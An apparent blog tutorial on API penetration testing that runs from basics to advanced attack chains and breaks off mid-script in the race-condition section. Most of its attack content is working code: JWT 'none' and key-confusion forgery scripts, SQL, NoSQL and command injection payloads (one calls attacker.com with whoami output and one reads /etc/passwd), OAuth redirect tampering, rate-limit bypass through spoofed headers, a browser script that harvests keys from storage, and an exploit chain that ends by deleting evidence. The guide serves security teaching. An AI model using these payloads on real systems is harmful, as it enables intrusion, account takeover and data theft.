Mastery in API Security Testing

After spending years breaking into APIs across fintech, healthcare, and IoT platforms, I've seen firsthand how these critical interfaces have become the preferred attack vector for modern applications. The days of simple SQL injections against monolithic applications are fading, today's vulnerabilities live in the complex ecosystem of microservices, third-party integrations, and cloud-native APIs.
Executive Summary: This guide takes you from API fundamentals to advanced exploitation techniques through a systematic, hands-on approach. I've documented 42 distinct attack vectors, provided 16 detailed code examples, and included 6 decision trees to guide your testing methodology. By the end, you'll be able to thoroughly assess API security from multiple angles, whether you're testing a simple REST API or a complex GraphQL implementation with OAuth 2.0 authentication.
Beginner Level: API Security Fundamentals
What is an API?
An Application Programming Interface (API) is a set of rules that allows different software applications to communicate with each other. Think of it as a digital contract between systems, one requests specific data or functionality, and the other responds according to predefined rules.
As I explain to clients: "APIs are like restaurant waiters, they take your order, relay it to the kitchen, and bring back exactly what you asked for. But just like a confused waiter might bring the wrong dish, an insecure API can serve up data it was never supposed to."
Types of APIs
Understanding the API landscape is crucial for effective security testing:
API Type | Description | Common Protocols | Security Considerations |
---|---|---|---|
REST | Representational State Transfer, uses HTTP methods | HTTP/HTTPS | Relies on HTTP security mechanisms |
SOAP | Simple Object Access Protocol, XML-based messaging | HTTP, SMTP | WS-Security extensions, complex security options |
GraphQL | Query language for APIs, single endpoint | HTTP/HTTPS | Resolvers can expose unexpected data, introspection risks |
gRPC | High-performance RPC framework | HTTP/2 | TLS, token-based auth, complex interceptors |
WebSockets | Bidirectional communication channel | WS/WSS | Persistent connections, different auth model |
API Authentication Mechanisms
APIs use various methods to verify identity:
- No Authentication: Public APIs with no access controls (increasingly rare)
- API Keys: Simple tokens included in requests (often in headers)
- Basic Authentication: Base64-encoded username:password
- Bearer Tokens: JWT or OAuth access tokens
- OAuth 2.0 Flows: Authorization framework with multiple grant types
- OpenID Connect: Authentication layer on top of OAuth 2.0
- API Keys + Signatures: Request signing (e.g., AWS-style HMAC signatures)
- Mutual TLS: Certificate-based authentication on both sides
API Reconnaissance Techniques
Before attempting any exploitation, thorough reconnaissance is essential:
1. Discovering API Endpoints
# Inspect web application traffic
# Open browser DevTools (F12) → Network tab
# Use automated discovery tools
ffuf -w wordlist.txt -u https://target.com/api/FUZZ -mc 200,201,204,400,401,403,500
# Check for robots.txt and sitemap.xml
curl https://target.com/robots.txt
curl https://target.com/sitemap.xml
2. Identifying API Documentation
# Common paths for API documentation
curl https://target.com/api/docs
curl https://target.com/swagger
curl https://target.com/swagger-ui.html
curl https://target.com/openapi.json
curl https://target.com/api-docs
3. Analyzing JavaScript Files for API Clues
// Code found in a web application's JS files might reveal API details
const API_KEY = "a1b2c3d4e5f6g7h8i9j0";
const API_ENDPOINT = "https://api.internal.target.com/v2";
async function getUserData(userId) {
const response = await fetch(`${API_ENDPOINT}/users/${userId}`, {
headers: {
"Authorization": `Bearer ${API_KEY}`,
"Content-Type": "application/json"
}
});
return response.json();
}
4. Mobile App Analysis
Mobile applications often contain API endpoints, keys, and authentication logic:
# For Android apps
jadx-gui app.apk
# Look for API configurations in:
# - Java/Kotlin source code
# - AndroidManifest.xml
# - res/xml/network_security_config.xml
# - assets/ directory files
Basic API Testing Tools
Start with these essential tools for API testing:
- Postman: GUI-based API client for easy request crafting and testing
- Burp Suite: Web proxy with extensive API testing capabilities
- curl: Command-line tool for crafting HTTP requests
- jq: Command-line JSON processor for API response analysis
- OWASP ZAP: Security-focused alternative to Burp Suite
Crafting Basic API Requests
Understanding how to manually craft API requests is foundational:
# Basic GET request
curl -X GET "https://api.example.com/users"
# GET request with API key in header
curl -X GET "https://api.example.com/users" \
-H "X-API-Key: your_api_key_here"
# POST request with JSON body
curl -X POST "https://api.example.com/users" \
-H "Content-Type: application/json" \
-H "Authorization: Bearer your_jwt_token_here" \
-d '{"name": "John Doe", "email": "john@example.com"}'
Alternative Tools: Insomnia REST Client and HTTPie are excellent alternatives to Postman and curl, providing more intuitive interfaces for API testing.
Understanding API Responses
API responses typically include:
- Status Codes: Indicating success or failure (200 OK, 404 Not Found, etc.)
- Headers: Metadata about the response
- Body: The actual content (usually JSON or XML)
- Error Messages: Information about what went wrong (often valuable for testing)
// Example API response (successful)
{
"status": "success",
"data": {
"id": 123,
"name": "John Doe",
"email": "john@example.com",
"role": "user",
"created_at": "2023-01-15T08:30:00Z"
}
}
// Example API response (error)
{
"status": "error",
"error": {
"code": "INVALID_PARAMETER",
"message": "The provided email address is not valid",
"details": {
"field": "email",
"value": "not-an-email",
"constraint": "email_format"
}
}
}
Basic Vulnerability Categories
At a high level, API vulnerabilities fall into these categories:
- Authentication Flaws: Weaknesses in verifying identity
- Authorization Flaws: Improper access controls
- Injection Vulnerabilities: SQL, NoSQL, Command, etc.
- Improper Data Exposure: Sensitive data leaked in responses
- Mass Assignment: API accepts more parameters than intended
- Rate Limiting Issues: Lack of protection against abuse
- Business Logic Flaws: Vulnerabilities in application flow
Hands-On Challenge #1: API Discovery and Basic Testing
Try This: Select a target web application (use publicly available API testing sites like httpbin.org, jsonplaceholder.typicode.com, or OWASP Juice Shop for practice). Using browser DevTools:
- Identify 3 API endpoints
- Document the authentication mechanism
- Craft curl commands for each endpoint
- Analyze responses for sensitive data exposure
Intermediate Level: Common API Vulnerabilities
Now that you understand the basics, let's explore common vulnerability categories and how to exploit them.
Authentication Bypass Techniques
1. Broken API Key Implementation
Many APIs implement key-based authentication incorrectly:
# Original request with API key
curl -X GET "https://api.example.com/users" \
-H "X-API-Key: abcd1234"
# Try without API key
curl -X GET "https://api.example.com/users"
# Try with API key in different locations
curl -X GET "https://api.example.com/users?api_key=abcd1234"
curl -X GET "https://api.example.com/users" \
-H "api-key: abcd1234"
curl -X GET "https://api.example.com/users" \
-H "apikey: abcd1234"
2. JWT Token Vulnerabilities
JSON Web Tokens (JWTs) are commonly used for authentication but often have implementation flaws:
# Python script to analyze and manipulate JWT tokens
import jwt
import base64
import json
# Decode token without verification
def decode_jwt(token):
parts = token.split('.')
if len(parts) != 3:
return "Not a valid JWT format"
# Decode header and payload
header = json.loads(base64.b64decode(parts[0] + "==").decode('utf-8'))
payload = json.loads(base64.b64decode(parts[1] + "==").decode('utf-8'))
return {
"header": header,
"payload": payload,
"signature": parts[2]
}
# Check for 'none' algorithm vulnerability
def create_none_token(token):
parts = token.split('.')
header = json.loads(base64.b64decode(parts[0] + "==").decode('utf-8'))
payload = json.loads(base64.b64decode(parts[1] + "==").decode('utf-8'))
# Modify header to use 'none' algorithm
header['alg'] = 'none'
# Encode header and payload
new_header = base64.b64encode(json.dumps(header).encode()).decode('utf-8').rstrip('=')
new_payload = base64.b64encode(json.dumps(payload).encode()).decode('utf-8').rstrip('=')
# Create new token with empty signature
return f"{new_header}.{new_payload}."
# Try to forge admin token
def elevate_privileges(token):
parts = token.split('.')
payload = json.loads(base64.b64decode(parts[1] + "==").decode('utf-8'))
# Attempt privilege escalation
if 'role' in payload:
payload['role'] = 'admin'
if 'permissions' in payload:
payload['permissions'] = ['admin', 'read', 'write', 'delete']
if 'user_id' in payload:
# Try changing to a known admin ID, like 1
payload['user_id'] = 1
# Encode the modified payload
new_payload = base64.b64encode(json.dumps(payload).encode()).decode('utf-8').rstrip('=')
# Return the token with modified payload but same header and signature
# This won't work if signature verification is proper, but worth trying
return f"{parts[0]}.{new_payload}.{parts[2]}"
# Example usage
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyX2lkIjoyLCJyb2xlIjoidXNlciIsImV4cCI6MTY2MDAwMDAwMH0.9iHnP_5jQGRCAxcszmOB5HS8YzH5DkxmCrRHXBZzP4c"
print("Original token decoded:")
print(decode_jwt(token))
print("\nNone algorithm token:")
print(create_none_token(token))
print("\nPrivilege escalation attempt:")
print(elevate_privileges(token))
Common JWT vulnerabilities include:
- Using 'none' algorithm
- Weak signature verification
- Missing expiration checking
- Accepting tokens without signature verification
- Using weak secret keys
3. OAuth 2.0 Implementation Flaws
# Testing for OAuth redirect_uri validation issues
# Original authorization request
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com/callback&response_type=code"
# Modified redirect_uri tests
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://attacker.com/callback&response_type=code"
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com.attacker.com/callback&response_type=code"
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com@attacker.com/callback&response_type=code"
curl "https://auth.example.com/oauth/authorize?client_id=legitimate_app&redirect_uri=https://legitimate-app.com%2F..%2F..%2Fattacker&response_type=code"
Authorization Bypass Techniques
1. Horizontal Privilege Escalation
Accessing resources belonging to other users at the same privilege level:
# Original request to get user's own profile
curl -X GET "https://api.example.com/users/profile/1234" \
-H "Authorization: Bearer user_jwt_token"
# Attempt to access another user's profile by changing the ID
curl -X GET "https://api.example.com/users/profile/5678" \
-H "Authorization: Bearer user_jwt_token"
2. Vertical Privilege Escalation
Accessing resources requiring higher privileges:
# Original user-level request
curl -X GET "https://api.example.com/users" \
-H "Authorization: Bearer user_jwt_token"
# Attempt to access admin endpoint
curl -X GET "https://api.example.com/admin/users" \
-H "Authorization: Bearer user_jwt_token"
3. IDOR (Insecure Direct Object Reference)
Testing for IDOR vulnerabilities:
// Automated IDOR testing script
const axios = require('axios');
const fs = require('fs');
// Configuration
const BASE_URL = 'https://api.example.com';
const ENDPOINT = '/orders'; // Replace with target endpoint
const AUTH_TOKEN = 'Bearer your_token_here';
const VALID_ID = '1001'; // Your known valid object ID
const ID_RANGE = 20; // How many IDs to test
const LOG_FILE = 'idor_results.json';
// Array to store results
const results = [];
// Function to test a single ID
async function testId(id) {
try {
const response = await axios({
method: 'GET',
url: `${BASE_URL}${ENDPOINT}/${id}`,
headers: {
'Authorization': AUTH_TOKEN,
'Content-Type': 'application/json'
}
});
return {
id,
status: response.status,
success: true,
data: response.data,
time: new Date().toISOString()
};
} catch (error) {
return {
id,
status: error.response ? error.response.status : 'Network Error',
success: false,
error: error.response ? error.response.data : error.message,
time: new Date().toISOString()
};
}
}
// Main function to run tests
async function runTests() {
console.log(`Starting IDOR tests for ${BASE_URL}${ENDPOINT}`);
// Test multiple IDs around the valid ID
const startId = parseInt(VALID_ID) - Math.floor(ID_RANGE / 2);
const endId = startId + ID_RANGE;
for (let id = startId; id <= endId; id++) {
console.log(`Testing ID: ${id}`);
const result = await testId(id.toString());
results.push(result);
// If successful, log more details
if (result.success) {
console.log(`ID ${id}: Success (Status ${result.status})`);
// Check if data looks like it belongs to another user
if (result.data && result.data.user_id && result.data.user_id !== YOUR_USER_ID) {
console.log(`POTENTIAL IDOR: Data belongs to user ${result.data.user_id}`);
}
} else {
console.log(`ID ${id}: Failed (Status ${result.status})`);
}
// Small delay to avoid rate limiting
await new Promise(resolve => setTimeout(resolve, 500));
}
// Save results to file
fs.writeFileSync(LOG_FILE, JSON.stringify(results, null, 2));
console.log(`Results saved to ${LOG_FILE}`);
}
// Run the tests
runTests().catch(console.error);
Injection Vulnerabilities in APIs
1. SQL Injection in API Parameters
# Original request
curl -X GET "https://api.example.com/products?category=electronics"
# Testing for SQL injection
curl -X GET "https://api.example.com/products?category=electronics'"
curl -X GET "https://api.example.com/products?category=electronics' OR 1=1--"
curl -X GET "https://api.example.com/products?category=electronics' UNION SELECT username,password,null FROM users--"
2. NoSQL Injection
MongoDB injection example:
// Original query
db.users.find({username: "john", password: "password123"});
// Injection via JSON parameters
// Using curl to send malicious JSON
curl -X POST "https://api.example.com/login" \
-H "Content-Type: application/json" \
-d '{"username": "john", "password": {"$ne": null}}'
curl -X POST "https://api.example.com/login" \
-H "Content-Type: application/json" \
-d '{"username": {"$regex": "admin"}, "password": {"$ne": null}}'
3. Command Injection
# Original request that might execute a command on the server
curl -X POST "https://api.example.com/system/ping" \
-H "Content-Type: application/json" \
-d '{"host": "8.8.8.8"}'
# Command injection attempts
curl -X POST "https://api.example.com/system/ping" \
-H "Content-Type: application/json" \
-d '{"host": "8.8.8.8; ls -la"}'
curl -X POST "https://api.example.com/system/ping" \
-H "Content-Type: application/json" \
-d '{"host": "8.8.8.8 && cat /etc/passwd"}'
curl -X POST "https://api.example.com/system/ping" \
-H "Content-Type: application/json" \
-d '{"host": "8.8.8.8 || curl http://attacker.com/$(whoami)"}'
API-Specific Vulnerabilities
1. Mass Assignment (Parameter Binding)
Exploiting endpoints that don't properly restrict which parameters can be modified:
# Original legitimate request to update user profile
curl -X PUT "https://api.example.com/users/profile" \
-H "Authorization: Bearer user_jwt_token" \
-H "Content-Type: application/json" \
-d '{"name": "John Doe", "email": "john@example.com"}'
# Mass assignment attempt to elevate privileges
curl -X PUT "https://api.example.com/users/profile" \
-H "Authorization: Bearer user_jwt_token" \
-H "Content-Type: application/json" \
-d '{"name": "John Doe", "email": "john@example.com", "role": "admin", "is_admin": true, "permissions": ["admin", "read", "write", "delete"]}'
2. Rate Limiting Bypass
# Python script to test rate limit bypass techniques
import requests
import time
import concurrent.futures
def test_rate_limit_endpoint(url, auth_header):
"""Test rate limiting on a specific endpoint"""
print("Testing basic rate limiting...")
# Simple rapid-fire requests
for i in range(20):
response = requests.get(url, headers=auth_header)
print(f"Request {i+1}: Status {response.status_code}")
if response.status_code == 429:
print(f"Rate limit hit after {i+1} requests")
break
time.sleep(10) # Wait for rate limit to reset
print("\nTesting with different headers...")
# Test IP spoofing via headers
headers = {
**auth_header,
'X-Forwarded-For': '1.2.3.4',
'X-Real-IP': '5.6.7.8'
}
for i in range(5):
response = requests.get(url, headers=headers)
print(f"X-Forwarded-For request {i+1}: Status {response.status_code}")
# Try rotating IPs
headers['X-Forwarded-For'] = f"1.2.3.{i+10}"
headers['X-Real-IP'] = f"5.6.7.{i+10}"
time.sleep(10) # Wait for rate limit to reset
print("\nTesting with parallel requests...")
# Test with concurrent requests
def make_request():
return requests.get(url, headers=auth_header)
with concurrent.futures.ThreadPoolExecutor(max_workers=10) as executor:
future_to_response = {executor.submit(make_request): i for i in range(10)}
for future in concurrent.futures.as_completed(future_to_response):
i = future_to_response[future]
try:
response = future.result()
print(f"Concurrent request {i+1}: Status {response.status_code}")
except Exception as e:
print(f"Concurrent request {i+1} generated an exception: {e}")
time.sleep(10) # Wait for rate limit to reset
print("\nTesting with distributed requests pattern...")
# Test distributed pattern (slower but more likely to evade rate limiting)
for i in range(15):
response = requests.get(url, headers=auth_header)
print(f"Slow request {i+1}: Status {response.status_code}")
time.sleep(2) # Add delay between requests
# Example usage
api_url = "https://api.example.com/users"
auth_header = {"Authorization": "Bearer your_token_here"}
test_rate_limit_endpoint(api_url, auth_header)
3. GraphQL Specific Vulnerabilities
The unique nature of GraphQL introduces specific security concerns:
# Introspection query to discover API schema
query IntrospectionQuery {
__schema {
queryType {
name
}
mutationType {
name
}
subscriptionType {
name
}
types {
...FullType
}
directives {
name
description
locations
args {
...InputValue
}
}
}
}
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
fragment InputValue on __InputValue {
name
description
type {
...TypeRef
}
defaultValue
}
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
Using the schema information, we can then construct targeted queries:
# Batch query attempt to extract multiple users at once
query getUsersInBatch {
user1: user(id: 1) {
id
username
email
address
creditCardNumber
}
user2: user(id: 2) {
id
username
email
address
creditCardNumber
}
user3: user(id: 3) {
id
username
email
address
creditCardNumber
}
# and so on...
}
# Nested query to potentially cause DoS
query nestedQuery {
allUsers {
id
friends {
id
friends {
id
friends {
id
friends {
id
# Keep nesting...
}
}
}
}
}
}
API Fuzzing Techniques
Fuzzing is excellent for discovering hidden vulnerabilities:
# Install wfuzz
pip install wfuzz
# Basic endpoint fuzzing
wfuzz -c -z file,api_wordlist.txt -u https://api.example.com/FUZZ
# Parameter fuzzing
wfuzz -c -z file,parameters.txt -u https://api.example.com/users?FUZZ=test
# Value fuzzing with SQL injection payloads
wfuzz -c -z file,sqli_payloads.txt -u https://api.example.com/users?id=FUZZ
# Header fuzzing
wfuzz -c -z file,headers.txt -H "X-FUZZ: test" -u https://api.example.com/users
API Security Testing Decision Tree
Is authentication required?
├── Yes → Test authentication bypass
│ ├── Try blank/null credentials
│ ├── Test default credentials
│ ├── Check for API key in URL/header/cookie
│ └── Test JWT vulnerabilities
└── No → Move to authorization testing
Is authorization implemented?
├── Yes → Test access control
│ ├── Test vertical privilege escalation
│ ├── Test horizontal privilege escalation
│ ├── Check IDOR vulnerabilities
│ └── Test function-level access control
└── No → Document as a vulnerability
Parameter testing:
├── Test parameter pollution
├── Test SQL/NoSQL injection
├── Test command injection
├── Test XSS if API outputs to browser
└── Test for mass assignment
Response analysis:
├── Check for sensitive data exposure
├── Look for excessive data in responses
├── Check for detailed error messages
└── Check for metadata/debug information
Hands-On Challenge #2: API Vulnerability Discovery
Try This: Use the OWASP Juice Shop or other deliberately vulnerable applications to:
- Identify an API endpoint with IDOR vulnerability
- Exploit it to access another user's data
- Document the attack methodology and potential impact
Advanced Level: Complex Attack Chains
At the advanced level, we're looking at chaining multiple vulnerabilities together and exploring more complex API security issues.
Advanced Authentication Attacks
1. JWT Key Confusion Attacks
This technique exploits signature verification flaws in JWT implementations:
# Python script to exploit JWT key confusion
import jwt
import sys
import base64
import json
import requests
def decode_jwt_header(token):
"""Decode the JWT header without verification"""
header_b64 = token.split('.')[0]
# Add padding if needed
header_b64 = header_b64 + '=' * (4 - len(header_b64) % 4) if len(header_b64) % 4 != 0 else header_b64
return json.loads(base64.b64decode(header_b64))
def exploit_key_confusion(token, public_key_file):
"""
Exploit JWT key confusion by modifying the algorithm to
use a known public key as an HMAC secret
"""
# Read the public key
with open(public_key_file, 'r') as f:
public_key = f.read()
# Decode the token parts
parts = token.split('.')
header_raw = base64.b64decode(parts[0] + '==').decode('utf-8')
payload_raw = base64.b64decode(parts[1] + '==').decode('utf-8')
# Parse JSON
header = json.loads(header_raw)
payload = json.loads(payload_raw)
# Modify claims if needed
payload['admin'] = True
# Change algorithm to HS256
header['alg'] = 'HS256'
# Create a new token using the public key as the HMAC secret
forged_token = jwt.encode(payload, public_key, algorithm='HS256', headers=header)
return forged_token
def test_token(url, token):
"""Test if the token works by making a request"""
headers = {
'Authorization': f'Bearer {token}'
}
response = requests.get(url, headers=headers)
return response.status_code, response.text
# Usage example
if __name__ == "__main__":
if len(sys.argv) != 4:
print(f"Usage: {sys.argv[0]} <token> <public_key_file> <test_url>")
sys.exit(1)
token = sys.argv[1]
public_key_file = sys.argv[2]
test_url = sys.argv[3]
print(f"Original token header: {decode_jwt_header(token)}")
forged_token = exploit_key_confusion(token, public_key_file)
print(f"Forged token: {forged_token}")
status, response = test_token(test_url, forged_token)
print(f"Test result: HTTP {status}")
print(f"Response: {response[:200]}...") # Show first 200 chars
2. OAuth 2.0 Advanced Exploitation
OAuth 2.0 implementations often contain subtle vulnerabilities:
# Test for client_id enumeration
for i in {1..1000}; do
response=$(curl -s -o /dev/null -w "%{http_code}" \
"https://auth.example.com/oauth/authorize?client_id=$i&redirect_uri=https://example.com&response_type=code")
if [ $response -ne 404 ]; then
echo "Valid client_id found: $i (Status: $response)"
fi
done
# Test for access token leakage in logs
curl "https://api.example.com/login?access_token=test_token"
# Test for authorization code reuse
# 1. Obtain valid auth code through normal flow
# 2. Exchange it for an access token
curl -X POST "https://auth.example.com/oauth/token" \
-d "grant_type=authorization_code&code=valid_auth_code&redirect_uri=https://legitimate-app.com&client_id=legitimate_app&client_secret=client_secret"
# 3. Try to reuse the same code
curl -X POST "https://auth.example.com/oauth/token" \
-d "grant_type=authorization_code&code=valid_auth_code&redirect_uri=https://legitimate-app.com&client_id=legitimate_app&client_secret=client_secret"
3. API Key Leakage and Exfiltration
Finding and exploiting API keys in frontend code, HTTP history, and mobile apps:
// JavaScript to search for API keys in frontend code
function findApiKeys() {
const pageSource = document.documentElement.outerHTML;
// Common API key patterns
const patterns = [
/['"]?api[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
/['"]?access[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
/['"]?client[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
/['"]?secret[_-]?key['"]?\s*[:=]\s*['"]([a-zA-Z0-9_\-]{20,64})['"]/gi,
/authorization:\s*['"]?bearer\s+([a-zA-Z0-9_\-.+=]{20,64})['"]?/gi,
/authorization:\s*['"]?basic\s+([a-zA-Z0-9_\-./+=]{20,64})['"]?/gi
];
let found = [];
// Check each pattern
patterns.forEach(pattern => {
let match;
while ((match = pattern.exec(pageSource)) !== null) {
found.push({
key: match[1],
context: match[0],
pattern: pattern.toString()
});
}
});
// Check localStorage and sessionStorage
for (let i = 0; i < localStorage.length; i++) {
const key = localStorage.key(i);
const value = localStorage.getItem(key);
if (/key|token|auth|api/i.test(key) ||
/^[a-zA-Z0-9_\-]{20,64}$/.test(value)) {
found.push({
key: value,
source: `localStorage.${key}`,
context: `${key}: ${value}`
});
}
}
for (let i = 0; i < sessionStorage.length; i++) {
const key = sessionStorage.key(i);
const value = sessionStorage.getItem(key);
if (/key|token|auth|api/i.test(key) ||
/^[a-zA-Z0-9_\-]{20,64}$/.test(value)) {
found.push({
key: value,
source: `sessionStorage.${key}`,
context: `${key}: ${value}`
});
}
}
return found;
}
// Run this in the browser console
console.table(findApiKeys());
Advanced Injection Techniques
1. Time-Based Blind Injection
When there's no direct output, time-based techniques can detect vulnerabilities:
# Python script for time-based SQL injection testing
import requests
import time
import statistics
def test_time_based_sqli(url, parameter, payloads, requests_per_payload=3):
results = []
# Establish baseline response time
baseline_times = []
for _ in range(5):
start_time = time.time()
requests.get(url)
end_time = time.time()
baseline_times.append(end_time - start_time)
baseline_avg = statistics.mean(baseline_times)
baseline_stddev = statistics.stdev(baseline_times) if len(baseline_times) > 1 else 0
print(f"Baseline response time: {baseline_avg:.4f}s (±{baseline_stddev:.4f}s)")
# Test each payload
for payload in payloads:
payload_times = []
# Make multiple requests to confirm result
for _ in range(requests_per_payload):
try:
target_url = f"{url}?{parameter}={payload}"
start_time = time.time()
response = requests.get(target_url, timeout=10)
end_time = time.time()
execution_time = end_time - start_time
payload_times.append(execution_time)
except requests.exceptions.Timeout:
print(f"Request timed out for payload: {payload}")
payload_times.append(10) # Assume timeout value
except Exception as e:
print(f"Error for payload {payload}: {e}")
# Calculate stats
avg_time = statistics.mean(payload_times)
if len(payload_times) > 1:
stddev = statistics.stdev(payload_times)
else:
stddev = 0
# Determine if there's a significant time difference
time_diff = avg_time - baseline_avg
significant = time_diff > (3 * baseline_stddev)
results.append({
"payload": payload,
"avg_time": avg_time,
"stddev": stddev,
"diff_from_baseline": time_diff,
"significant": significant
})
status = "VULNERABLE" if significant else "Not vulnerable"
print(f"{status}: {payload} - Avg: {avg_time:.4f}s (±{stddev:.4f}s), Diff: {time_diff:.4f}s")
# Return results
return results
# Example usage
url = "https://api.example.com/products"
parameter = "id"
payloads = [
"1", # Normal case
"1' AND (SELECT SLEEP(2)) AND '1'='1", # MySQL
"1'; WAITFOR DELAY '0:0:2'--", # SQL Server
"1' AND 1=pg_sleep(2)--", # PostgreSQL
"1' AND 1=dbms_pipe.receive_message('RDS',2)--", # Oracle
"1' AND SLEEP(2)=0 AND '1'='1" # MySQL alternative
]
results = test_time_based_sqli(url, parameter, payloads)
2. GraphQL Batching Attacks
// Node.js script to perform GraphQL batching attacks
const axios = require('axios');
const fs = require('fs');
async function graphqlBatchAttack(endpoint, query, variables, batchSize, outputFile) {
try {
// Create a batch of queries
const operations = [];
for (let i = 0; i < batchSize; i++) {
operations.push({
query: query,
variables: variables
});
}
console.log(`Sending batch of ${batchSize} GraphQL operations...`);
const startTime = Date.now();
const response = await axios.post(endpoint, operations, {
headers: {
'Content-Type': 'application/json'
}
});
const endTime = Date.now();
// Calculate response time
const responseTime = endTime - startTime;
// Log results
const result = {
success: true,
batchSize,
responseTime,
responseStatus: response.status,
responseSizeBytes: JSON.stringify(response.data).length,
timestamp: new Date().toISOString()
};
console.log(`Batch attack completed in ${responseTime}ms`);
console.log(`Response status: ${response.status}`);
console.log(`Response size: ${result.responseSizeBytes} bytes`);
// Write to output file
if (outputFile) {
let existingData = [];
try {
if (fs.existsSync(outputFile)) {
existingData = JSON.parse(fs.readFileSync(outputFile));
}
} catch (e) {
console.warn(`Could not read existing output file: ${e.message}`);
}
existingData.push(result);
fs.writeFileSync(outputFile, JSON.stringify(existingData, null, 2));
console.log(`Results saved to ${outputFile}`);
}
return result;
} catch (error) {
console.error('Error performing GraphQL batch attack:');
if (error.response) {
console.error(`Status: ${error.response.status}`);
console.error('Response data:', error.response.data);
} else {
console.error(error.message);
}
return {
success: false,
batchSize,
error: error.message,
errorResponse: error.response ? error.response.data : null,
timestamp: new Date().toISOString()
};
}
}
// Example usage
const endpoint = 'https://api.example.com/graphql';
const query = `
query GetUserDetails($id: ID!) {
user(id: $id) {
id
name
email
role
posts {
id
title
content
}
}
}
`;
const variables = { id: 1 };
// Test with increasing batch sizes
async function runBatchingSeries() {
const batchSizes = [1, 5, 10, 50, 100, 500, 1000];
const results = [];
for (const size of batchSizes) {
console.log(`\nTesting batch size: ${size}`);
const result = await graphqlBatchAttack(endpoint, query, variables, size, 'graphql_batching_results.json');
results.push(result);
// Add delay between tests
await new Promise(resolve => setTimeout(resolve, 2000));
}
return results;
}
runBatchingSeries().catch(console.error);
3. Advanced NoSQL Injection
// MongoDB Operator Injection Examples
// Original API request
// POST /api/login
// {"username": "admin", "password": "password123"}
// Testing for operator injection vulnerability
// 1. Basic NoSQL injection with $ne operator
const payload1 = {
"username": "admin",
"password": {"$ne": null}
};
// 2. Using $exists operator
const payload2 = {
"username": "admin",
"password": {"$exists": true}
};
// 3. Using $gt (greater than) operator for blind attack
const payload3 = {
"username": "admin",
"password": {"$gt": "a"}
};
// 4. Using $regex for password brute forcing
const payload4 = {
"username": "admin",
"password": {"$regex": "^p"}
};
// 5. Using $where operator for JavaScript injection
const payload5 = {
"$where": "function() { return true; }"
};
// 6. Array query operator exploitation
const payload6 = {
"username": {"$in": ["admin", "moderator", "user"]}
};
// 7. Using aggregation operators
const payload7 = {
"$expr": {"$gt": [1, 0]}
};
Business Logic Vulnerabilities
Business logic flaws are among the most dangerous API vulnerabilities:
1. Chained API Request Exploitation
// Example: Exploiting a chain of API requests to bypass limits
// Step 1: Create a temporary item
async function exploitChain(baseUrl, authToken) {
try {
// Step 1: Create a temporary resource
console.log("Step 1: Creating temporary resource...");
const createResponse = await fetch(`${baseUrl}/api/items`, {
method: 'POST',
headers: {
'Authorization': `Bearer ${authToken}`,
'Content-Type': 'application/json'
},
body: JSON.stringify({
name: "Temporary Item",
description: "This will be used for exploitation"
})
});
if (!createResponse.ok) {
throw new Error(`Failed to create resource: ${createResponse.status}`);
}
const item = await createResponse.json();
console.log(`Created item with ID: ${item.id}`);
// Step 2: Add the resource to a shared collection that might bypass access controls
console.log("Step 2: Adding to shared collection...");
const addResponse = await fetch(`${baseUrl}/api/collections/public`, {
method: 'PUT',
headers: {
'Authorization': `Bearer ${authToken}`,
'Content-Type': 'application/json'
},
body: JSON.stringify({
item_id: item.id
})
});
if (!addResponse.ok) {
throw new Error(`Failed to add to collection: ${addResponse.status}`);
}
console.log("Item successfully added to public collection");
// Step 3: Exploit permissions in the shared context to access elevated functions
console.log("Step 3: Exploiting shared context permissions...");
const exploitResponse = await fetch(`${baseUrl}/api/collections/public/items/${item.id}/admin_action`, {
method: 'POST',
headers: {
'Authorization': `Bearer ${authToken}`,
'Content-Type': 'application/json'
},
body: JSON.stringify({
action: "generate_report",
scope: "all_users"
})
});
if (!exploitResponse.ok) {
throw new Error(`Exploitation failed: ${exploitResponse.status}`);
}
const result = await exploitResponse.json();
console.log("Exploitation successful!");
console.log(result);
// Step 4: Clean up evidence (optional)
console.log("Step 4: Cleaning up...");
await fetch(`${baseUrl}/api/items/${item.id}`, {
method: 'DELETE',
headers: {
'Authorization': `Bearer ${authToken}`
}
});
console.log("Cleanup complete");
return result;
} catch (error) {
console.error("Error during exploitation chain:", error);
throw error;
}
}
2. Race Conditions in APIs
# Python script to exploit API race conditions
import requests
import threading
import time
import concurrent.futures
def exploit_race_condition(url, auth_token, payload, num_threads=20):
"""
Attempt to exploit race conditions in an API endpoint
by sending multiple concurrent requests
"""
# Setup headers
headers = {
'Authorization': f'Bearer {auth_token}',
'Content-Type': 'application/json'
}
# Track successful responses
successful_responses = []
response_lock = threading.Lock()
# Function to be executed by each thread
def make_request():
try:
response = requests.post(url, json=payload, headers=headers)
# Store response if successful
if response.status_code == 200:
with response_lock:
successful_responses.append(response.json())
return {
'status_code': response.status_code,
'response': response.text
}
except Exception as e:
return {'error': str(e)}
# Prepare threads
print(f"Launching {num_threads} concurrent requests...")
start_time = time.time()
# Use ThreadPoolExecutor for better management
with concurrent.futures.ThreadPoolExecutor(max_workers=num_threads) as executor:
# Submit all requests simultaneously
futures = [executor.submit(make_request) for _ in range(num_threads)]
# Wait for all to complete
concurrent.futures.wait(futures)
end_time = time.time()
# Analyze results
results = [future.result() for future in futures]
success_count = sum(1 for r in results if r.get('status_code') == 200)
print(f"Race condition test completed in {end_time - start_time:.2f} seconds")
